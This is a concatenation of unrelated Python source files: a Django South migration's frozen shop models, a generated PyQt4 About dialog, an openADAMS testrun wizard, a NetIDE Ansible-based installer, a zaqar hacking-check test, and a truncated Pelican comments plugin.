'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'shop.category': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Category', '_ormbases': [u'pages.Page']},
'carousel_color': ('django.db.models.fields.CharField', [], {'default': "'dgreen-list'", 'max_length': '11'}),
'combined': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'featured_image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.PageMarquee']", 'null': 'True', 'blank': 'True'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product_options'", 'blank': 'True', 'to': u"orm['shop.ProductOption']"}),
u'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'}),
'price_max': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'price_min': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'products': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['shop.Product']", 'symmetrical': 'False', 'blank': 'True'}),
'sale': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Sale']", 'null': 'True', 'blank': 'True'})
},
u'shop.order': {
'Meta': {'ordering': "('-id',)", 'object_name': 'Order'},
'additional_instructions': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'billing_detail_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'billing_detail_country': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'billing_detail_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'billing_detail_first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'billing_detail_last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'billing_detail_phone': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'billing_detail_postcode': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'billing_detail_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'billing_detail_street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'discount_code': ('cartridge.shop.fields.DiscountCodeField', [], {'max_length': '20', 'blank': 'True'}),
'discount_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'payment_method': ('django.db.models.fields.CharField', [], {'default': "'paypal'", 'max_length': '6'}),
'shipping_detail_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_detail_country': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_detail_first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_detail_last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_detail_phone': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'shipping_detail_postcode': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'shipping_detail_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_detail_street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'shipping_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'tax_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'tax_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'transaction_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'user_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'shop.product': {
'Meta': {'object_name': 'Product'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'available': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['shop.Category']", 'symmetrical': 'False', 'blank': 'True'}),
u'comments_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'num_in_stock': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'rating_average': ('django.db.models.fields.FloatField', [], {'default': '0'}),
u'rating_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'rating_sum': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_products_rel_+'", 'blank': 'True', 'to': u"orm['shop.Product']"}),
'sale_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'sale_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'sale_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'sale_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'sku': ('cartridge.shop.fields.SKUField', [], {'max_length': '20', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'unit_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'upsell_products': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'upsell_products_rel_+'", 'blank': 'True', 'to': u"orm['shop.Product']"})
},
u'shop.productoption': {
'Meta': {'object_name': 'ProductOption'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('cartridge.shop.fields.OptionField', [], {'max_length': '50', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {})
},
u'shop.sale': {
'Meta': {'object_name': 'Sale'},
'active': ('django.db.models.fields.BooleanField', [], {}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'sale_related'", 'blank': 'True', 'to': u"orm['shop.Category']"}),
'discount_deduct': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'discount_exact': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'discount_percent': ('cartridge.shop.fields.PercentageField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'products': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['shop.Product']", 'symmetrical': 'False', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'valid_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'valid_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
# South: limit this migration's frozen ORM / operations to the 'bccf' app.
complete_apps = ['bccf']
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'modisTrack_about_ui.ui'
#
# Created: Sat Jan 16 05:12:28 2016
# by: PyQt4 UI code generator 4.10.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
# Compatibility shims for different PyQt4 builds: under SIP API v2 there is
# no QString and QApplication.translate() takes no encoding argument, so we
# fall back to the simpler forms when the attributes are missing.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        # QString is absent (API v2): plain str is already unicode.
        return s
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    # Newer PyQt4: translate() has no encoding parameter.
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_Dialog(object):
    """pyuic4-generated UI class for the modisTrack "About" dialog.

    NOTE: generated from 'modisTrack_about_ui.ui' — edit the .ui file,
    not this code; manual changes are lost on regeneration.
    """

    def setupUi(self, Dialog):
        # Build the widget tree and layout for `Dialog` (title, version
        # label, and a scrollable HTML about-text).
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(291, 300)
        Dialog.setMinimumSize(QtCore.QSize(291, 300))
        Dialog.setMaximumSize(QtCore.QSize(554, 383))
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/plugins/modisTrackL1L2/icon.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        Dialog.setWindowIcon(icon)
        self.gridLayout = QtGui.QGridLayout(Dialog)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        # Title label: bold, 12pt.
        self.label = QtGui.QLabel(Dialog)
        font = QtGui.QFont()
        font.setPointSize(12)
        font.setBold(True)
        font.setWeight(75)
        self.label.setFont(font)
        self.label.setObjectName(_fromUtf8("label"))
        self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
        # Version label, right-aligned.
        self.label_2 = QtGui.QLabel(Dialog)
        self.label_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
        # Scroll area holding the word-wrapped about text (label_3).
        self.scrollArea = QtGui.QScrollArea(Dialog)
        self.scrollArea.setWidgetResizable(True)
        self.scrollArea.setObjectName(_fromUtf8("scrollArea"))
        self.scrollAreaWidgetContents = QtGui.QWidget()
        self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 271, 236))
        self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
        self.verticalLayout = QtGui.QVBoxLayout(self.scrollAreaWidgetContents)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.label_3 = QtGui.QLabel(self.scrollAreaWidgetContents)
        self.label_3.setWordWrap(True)
        self.label_3.setOpenExternalLinks(True)
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.verticalLayout.addWidget(self.label_3)
        self.scrollArea.setWidget(self.scrollAreaWidgetContents)
        self.gridLayout.addWidget(self.scrollArea, 2, 0, 1, 1)
        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        # All user-visible strings live here so the dialog can be
        # retranslated without rebuilding the widget tree.
        Dialog.setWindowTitle(_translate("Dialog", "About", None))
        self.label.setText(_translate("Dialog", "MODIS Track L1 L2", None))
        self.label_2.setText(_translate("Dialog", "ver. 1.0", None))
        self.label_3.setText(_translate("Dialog", "<html><head/><body><p><span style=\" font-size:9pt;\">Modis Track L1 L2 Plugin</span></p><p>This module allows to create Terra/Aqua track at selected date as shapefile;\n"
            " to create extents of scenes for all track points at day as shapefile;\n"
            " to define needed scenes for user\'s vector layer.\n"
            "Space-track.org can be used for TLE retrieving</p><p><span style=\" font-size:9pt;\">You can send your suggestions on silenteddie@gmail.com</span></p><p><span style=\" font-size:9pt;\">Modis Track L1 L2 - Licence GNU GPL 2</span></p><p><span style=\" font-size:9pt;\">Written in 2016 by Eduard Kazakov (</span><a href=\"http://www.ekazakov.info\"><span style=\" font-size:9pt; text-decoration: underline; color:#0000ff;\">ekazakov.info</span></a><span style=\" font-size:9pt;\">)</span></p></body></html>", None))
|
# -*- coding: utf-8 -*-
# $Id$
# -------------------------------------------------------------------
# Copyright 2012 Achim Köhler
#
# This file is part of openADAMS.
#
# openADAMS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License,
# or (at your option) any later version.
#
# openADAMS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with openADAMS. If not, see <http://www.gnu.org/licenses/>.
# -------------------------------------------------------------------
from PyQt4 import QtGui, QtCore, QtSql
from PyQt4.QtCore import Qt
import filepicker
import _oatr_tableview
import _oatr_commons
class cTestrunnerImportWizard(QtCore.QObject):
    """Three-page wizard collecting everything needed to create a testrun:
    the source database (page 0), the testsuite to run (page 1), and the
    output file plus title/description (page 2).
    """

    def __init__(self, parent=None):
        # NOTE(review): `parent` is accepted but not forwarded to QObject —
        # kept as-is to preserve caller-visible behaviour.
        super(cTestrunnerImportWizard, self).__init__()
        self.testsuiteWizardPage = cTestsuiteWizardPage()
        self.infoWizardPage = cInfoWizardPage()
        self.wizard = QtGui.QWizard()
        self.wizard.addPage(self.createImportDatabasePage())  # page id 0
        self.wizard.addPage(self.testsuiteWizardPage)         # page id 1
        self.wizard.addPage(self.infoWizardPage)              # page id 2
        self.wizard.setWindowTitle(self.tr("Create new testrun"))
        self.wizard.currentIdChanged.connect(self.idChangedHandler)

    def idChangedHandler(self, currentId):
        """Keep the wizard's navigation buttons consistent with the page shown."""
        if currentId == 0:
            # on first page, disable continue button when import filename is invalid
            self.wizard.button(QtGui.QWizard.NextButton).setEnabled(self.inputFilePicker.isValidFilename())
        elif currentId == 1:
            # Load testsuites from the chosen database; no rows, no Next.
            self.testsuiteWizardPage.initTable(self.inputFilePicker.getFilename())
            self.wizard.button(QtGui.QWizard.NextButton).setDisabled(self.testsuiteWizardPage.tableIsEmpty())
        elif currentId == 2:
            self.wizard.button(QtGui.QWizard.FinishButton).setEnabled(False) # user has to enter
            # Derive a default output filename from the input database name,
            # swapping the extension for the testrun file suffix.
            fileInfo = QtCore.QFileInfo(self.inputFilePicker.getFilename())
            fileInfo.setFile(fileInfo.dir(), fileInfo.baseName()+'.%s' % _oatr_commons.TR_FILE_SUFFIX)
            fileName = fileInfo.filePath()
            self.infoWizardPage.outputFilePicker.setFileName(fileName)
        else:
            pass

    def createImportDatabasePage(self):
        """Build page 0: a file picker for the database holding the testsuite."""
        page = QtGui.QWizardPage()
        page.setTitle(self.tr("Select database with testsuite to run"))
        layout = QtGui.QHBoxLayout()
        self.inputFilePicker = filepicker.cFilePicker()
        self.inputFilePicker.sigValidFilename.connect(self.validImportFilename)
        widgets = self.inputFilePicker.getWidgets()
        widgets['label'].setText(self.tr("Database"))
        widgets['dialog'].setNameFilter(self.tr("Database files (*.db);;All files (*.*)"))
        widgets['dialog'].setFileMode(QtGui.QFileDialog.ExistingFile)
        # Explicit loop instead of map(): map() is a lazy iterator on
        # Python 3, so the side-effecting addWidget calls would never run.
        for widget in (widgets['label'], widgets['combobox'], widgets['button']):
            layout.addWidget(widget)
        layout.setStretch(1, 10)
        page.setLayout(layout)
        return page

    def show(self):
        """Run the wizard modally.

        Returns a dict with the collected settings when the user accepts,
        or None when the wizard is cancelled.
        """
        if self.wizard.exec_() == QtGui.QDialog.Accepted:
            return {'srcDatabase': self.inputFilePicker.getFilename(),
                    'destDatabase': self.infoWizardPage.outputFilePicker.getFilename(),
                    'testsuiteId': self.testsuiteWizardPage.getSelectedTestsuiteId(),
                    'title': unicode(self.infoWizardPage.leTitle.text()),
                    'description': unicode(self.infoWizardPage.teDescription.toPlainText())}
        else:
            return None

    def validImportFilename(self, isValid):
        # Slot for the file picker's validity signal: gate the Next button.
        self.wizard.button(QtGui.QWizard.NextButton).setEnabled(isValid)
class cTestsuiteWizardPage(QtGui.QWizardPage):
    """Wizard page 1: table listing the testsuites found in the database."""

    def __init__(self):
        super(cTestsuiteWizardPage, self).__init__()
        self.setTitle(self.tr("Select testsuite to run"))
        layout = QtGui.QHBoxLayout()
        self.tableView = _oatr_tableview.cTestsuiteTableView(self, model=None)
        layout.addWidget(self.tableView)
        self.setLayout(layout)

    def initTable(self, databaseName):
        """Open `databaseName` and show its 'testsuites' table in the view.

        NOTE(review): addDatabase() with the fixed connection name
        'importconnection' replaces any earlier connection of that name when
        this page is visited a second time (Qt logs a warning) — confirm
        this is acceptable.
        """
        self.database = QtSql.QSqlDatabase.addDatabase("QSQLITE", 'importconnection')
        self.database.setHostName("")
        self.database.setDatabaseName(databaseName)
        self.database.open()
        model = QtSql.QSqlTableModel(self, self.database)
        model.setTable('testsuites')
        self.tableView.setModel(model)
        # Hide columns 1 and 3-7.  Explicit loop instead of map(): map() is
        # a lazy iterator on Python 3, so the side-effecting calls would
        # silently never run there.
        for column in (1, 3, 4, 5, 6, 7):
            self.tableView.setColumnHidden(column, True)
        self.tableView.setHeader()
        model.reset()
        model.select()
        if not self.tableIsEmpty():
            self.tableView.selectRow(0)

    def tableIsEmpty(self):
        """Return True when the model holds no testsuite rows."""
        return self.tableView.model().rowCount() == 0

    def getSelectedTestsuiteId(self):
        """Return the id (column 0) of the currently selected testsuite row."""
        index = self.tableView.model().index(self.tableView.currentIndex().row(), 0)
        return self.tableView.model().data(index).toInt()[0]
class cInfoWizardPage(QtGui.QWizardPage):
    """Wizard page 2: output file picker, mandatory title, and description."""

    def __init__(self):
        super(cInfoWizardPage, self).__init__()
        self.setTitle(self.tr("Enter testrun information"))
        layout = QtGui.QGridLayout()
        self.outputFilePicker = filepicker.cFilePicker()
        widgets = self.outputFilePicker.getWidgets()
        widgets['label'].setText(self.tr("Testrun file"))
        widgets['dialog'].setNameFilter(self.tr("Testrun files (*.%s);;All files (*.*)" % _oatr_commons.TR_FILE_SUFFIX))
        widgets['dialog'].setFileMode(QtGui.QFileDialog.AnyFile)
        widgets['dialog'].setAcceptMode(QtGui.QFileDialog.AcceptSave)
        layout.addWidget(widgets['label'], 0, 0)
        layout.addWidget(widgets['combobox'], 0, 1)
        layout.addWidget(widgets['button'], 0, 2)
        layout.addWidget(QtGui.QLabel(self.tr("Title")), 1, 0)
        self.leTitle = QtGui.QLineEdit()
        # The '*' suffix marks the field mandatory: the wizard's Finish
        # button stays disabled until a title is entered.
        # (Fixed: dropped a stray trailing semicolon here.)
        self.registerField("title*", self.leTitle)  # title is mandatory
        layout.addWidget(self.leTitle, 1, 1, 1, 2)
        layout.addWidget(QtGui.QLabel(self.tr("Description"), alignment=Qt.AlignTop), 2, 0)
        self.teDescription = QtGui.QTextEdit()
        layout.addWidget(self.teDescription, 2, 1, 1, 2)
        layout.setColumnStretch(1, 1)
        self.setLayout(layout)

    def validatePage(self):
        """Confirm overwrite when the chosen output file already exists.

        Returns False (stay on the page) when the user declines or the stale
        file cannot be removed; True lets the wizard proceed.
        """
        fileName = self.outputFilePicker.getFilename()
        if QtCore.QFile.exists(fileName):
            r = QtGui.QMessageBox.warning(self, self.tr("Overwrite file"),
                                          self.tr("File %s already exists. Okay to overwrite?" % fileName),
                                          QtGui.QMessageBox.Yes|QtGui.QMessageBox.No)
            if r == QtGui.QMessageBox.No:
                return False
            if not QtCore.QFile.remove(fileName):
                QtGui.QMessageBox.critical(self, self.tr("Failure"), self.tr("Failed to remove file %s" % fileName))
                return False
        return True
|
"""
Copyright (c) 2015, NetIDE Consortium (Create-Net (CN), Telefonica Investigacion Y Desarrollo SA (TID), Fujitsu
Technology Solutions GmbH (FTS), Thales Communications & Security SAS (THALES), Fundacion Imdea Networks (IMDEA),
Universitaet Paderborn (UPB), Intel Research & Innovation Ireland Ltd (IRIIL), Fraunhofer-Institut für
Produktionstechnologie (IPT), Telcaria Ideas SL (TELCA) )
All rights reserved. This program and the accompanying materials
are made available under the terms of the Eclipse Public License v1.0
which accompanies this distribution, and is available at
http://www.eclipse.org/legal/epl-v10.html
Authors:
Gregor Best, gbe@mail.upb.de
"""
import json
import logging
import os
import platform
import requests
import stat
import subprocess as sp
import sys
import tempfile
from subprocess import call
from loader import environment
from loader import util
from loader.package import Package
# XXX make this configurable
install_package_command = "sudo apt-get install --yes {}"
class InstallException(Exception): pass
def do_server_install(pkg):
    """Install the NetIDE core/engine for package `pkg` on this server host.

    Returns 2 on failure (bad package or unmet system requirements), None on
    success.  Raises InstallException when the package configuration has no
    "server" section or names a host other than this machine / localhost.
    """
    logging.debug("Doing server install for '{}' now".format(pkg))
    # NOTE(review): `prefix` is computed but never used — presumably a
    # leftover; confirm before removing.
    prefix = os.path.expanduser("~")
    with util.TempDir("netide-server-install") as t:
        p = Package(pkg, t)
        if not p.load_apps_and_controller():
            logging.error("There's something wrong with the package")
            return 2
        # Bootstrap the Ansible virtualenv before running any playbooks.
        call(["./virtualEnv_Ansible_Install.sh"])
        if "server" not in p.config:
            raise InstallException('"server" section missing from configuration!')
        conf = p.config["server"]
        util.editPlaybookServer(conf)
        # Refuse to run when the configured host is neither this machine
        # nor localhost.
        if "host" in conf and platform.node() != conf["host"] and conf["host"] != "localhost":
            raise InstallException("Attempted server installation on host {} (!= {})".format(platform.node(), conf["host"]))
        # with open("Playbook_Setup/sever.yml", "w") as serverYml:
        #     serverYml.write("--- \n - name: install prereq for all hosts \n hosts: localhost \n roles: - prereq - core \n ...")
        #install core and engine on server (usually localhost)
        #read p.config[server] and add server to site.yml
        call(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteServer.yml")])
        #Check the rest of system requirements
        logging.debug("Checking system requirements for {}".format(pkg))
        if not p.check_no_hw_sysreq():
            logging.error("Requirements for package {} not met".format(pkg))
            return 2
def do_client_installs(pkgpath, dataroot):
    """Dispatch installation requests to client machines after gaining a
    foothold on them.  Requires passwordless SSH access to client machines
    and passwordless root via sudo on client machines.

    Returns 2 when the package fails to load; None otherwise.

    NOTE(review): `dataroot` is only referenced by the commented-out legacy
    playbook code below — confirm whether it is still needed.
    """
    with util.TempDir("netide-client-installs") as t:
        pkg = Package(pkgpath, t)
        if not pkg.load_apps_and_controller():
            logging.error("There's something wrong with the package")
            return 2
        # NOTE(review): `clients` is unused by the active code path; the
        # playbook run below appears to take its inventory from the files
        # edited by editPlaybookClient — confirm.
        clients = pkg.get_clients()
        #controller = pkg.controllers
        #print("controller: ")
        #print(controller)
        #for n in controller:
        #    print("instance of controller: ")
        #    print(n)
        #    for i in controller[n]:
        #        print(i)
        util.editPlaybookClient(pkg)
        util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteClient.yml")])
#===============================================================================
# util.write_ansible_hosts(clients, os.path.join(t, "ansible-hosts"))
#
# tasks = []
#
# # Can't use `synchronize' here because that doesn't play nice with ssh options
# tasks.append({
# "name": "Copy NetIDE loader",
# "copy": {
# "dest": '{{ansible_user_dir}}/netide-loader-tmp',
# "src" : os.getcwd()}})
#
# # We need to do this dance because `copy' copies to a subdir unless
# # `src' ends with a '/', in which case it doesn't work at all (tries
# # to write to '/' instead)
# tasks.append({
# "shell": "mv {{ansible_user_dir}}/netide-loader-tmp/loader {{ansible_user_dir}}/netide-loader",
# "args": {"creates": "{{ansible_user_dir}}/netide-loader"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader-tmp", "state": "absent"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader/netideloader.py", "mode": "ugo+rx"}})
#
# tasks.append({
# "name": "Bootstrap NetIDE loader",
# "shell": "bash ./setup.sh",
# "args": { "chdir": "{{ansible_user_dir}}/netide-loader" }})
#
# #is already cloned...
# tasks.append({
# "name": "Clone IDE repository",
# "git": {
# "repo": "http://github.com/fp7-netide/IDE.git",
# "dest": "{{ansible_user_dir}}/IDE",
# "version": "development"}})
#
# #has been done in setup server
# tasks.append({
# "name": "Install Engine",
# "shell": "bash {{ansible_user_dir}}/IDE/plugins/eu.netide.configuration.launcher/scripts/install_engine.sh"})
# #add creates:
# tasks.append({
# "file": {
# "path": dataroot,
# "state": "directory"}})
#
# tasks.append({
# "name": "Register Package checksum",
# "copy": {
# "content": json.dumps({"cksum": pkg.cksum}, indent=2),
# "dest": os.path.join(dataroot, "controllers.json")}})
#
# playbook = [{"hosts": "clients", "tasks": tasks}]
#
# #use new role system here !
# for c in clients:
#
# ctasks = []
#
# apps = []
# # Collect controllers per client machine and collect applications
# for con in pkg.controllers_for_node(c[0]):
# apps.extend(con.applications)
# cname = con.__name__.lower()
# if cname not in ["ryu", "floodlight", "odl", "pox", "pyretic"]:
# raise InstallException("Don't know how to install controller {}".format(cname))
#
# script = ["{{ansible_user_dir}}", "IDE", "plugins", "eu.netide.configuration.launcher", "scripts"]
# script.append("install_{}.sh".format(cname))
#
# ctasks.append({
# "name": "install controller {}".format(cname),
# "shell": "bash {}".format(os.path.join(*script)),
# "args": {"chdir": "{{ansible_user_dir}}"}})
#
# # Install application dependencies
# # XXX: ugly :/
# # XXX: libraries
# for a in apps:
# reqs = a.metadata.get("requirements", {}).get("Software", {})
#
# # Languages
# for l in reqs.get("Languages", {}):
# if l["name"] == "python":
# if l["version"].startswith("3"):
# l["name"] += "3"
# else:
# l["name"] += "2"
# elif l["name"] == "java":
# if "7" in l["version"]:
# l["name"] = "openjdk-7-jdk"
# elif "8" in l["version"]:
# l["name"] = "openjdk-8-jdk"
# else:
# l["name"] = "openjdk-6-jdk"
#
# ctasks.append({
# "name": "install {} (for app {})".format(l["name"], str(a)),
# "apt": {"pkg": "{}={}*".format(l["name"], l["version"])}})
# playbook.append({"hosts": c[0], "tasks": ctasks})
#
# # A valid JSON-document is also valid YAML, so we can take a small shortcut here
# with open(os.path.join(t, "a-playbook.yml"), "w") as ah:
# json.dump(playbook, ah, indent=2)
# print(playbook)
# util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", "-i", os.path.join(t, "ansible-hosts"), os.path.join(t, "a-playbook.yml")])
#===============================================================================
|
# Copyright (c) 2017 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from zaqar.hacking import checks
from zaqar.tests import base
class HackingTestCase(base.TestBase):
    """Exercise the project's custom flake8 hacking checks."""

    def test_no_log_translations(self):
        """Every log-level/translation-hint pairing must be flagged once."""
        for level in checks._all_log_levels:
            for marker in checks._all_hints:
                # A literal message wrapped in a translation helper.
                literal_call = 'LOG.%s(%s("Bad"))' % (level, marker)
                found = list(checks.no_translate_logs(literal_call))
                self.assertEqual(1, len(found))
                # Catch abuses when used with a variable and not a literal
                variable_call = 'LOG.%s(%s(msg))' % (level, marker)
                found = list(checks.no_translate_logs(variable_call))
                self.assertEqual(1, len(found))
|
# -*- coding: utf-8 -*-
import traceback
from pelican import signals
from henet.comments import ArticleThread
from henet.rst.rst2html import rst2html
# xxx read config
storage_dir = '/Users/tarek/Dev/github.com/acr-dijon.org/comments/'
# xxx cache
def add_comments(generator, content):
    """Pelican hook: attach an article's comment thread to its metadata.

    The article's relative source path (not its URL) is used as the unique
    id, so comments are not dependent on the URL.  Each comment's reST text
    is rendered to HTML and the whole thread is stored under
    content.metadata["comments"].
    """
    try:
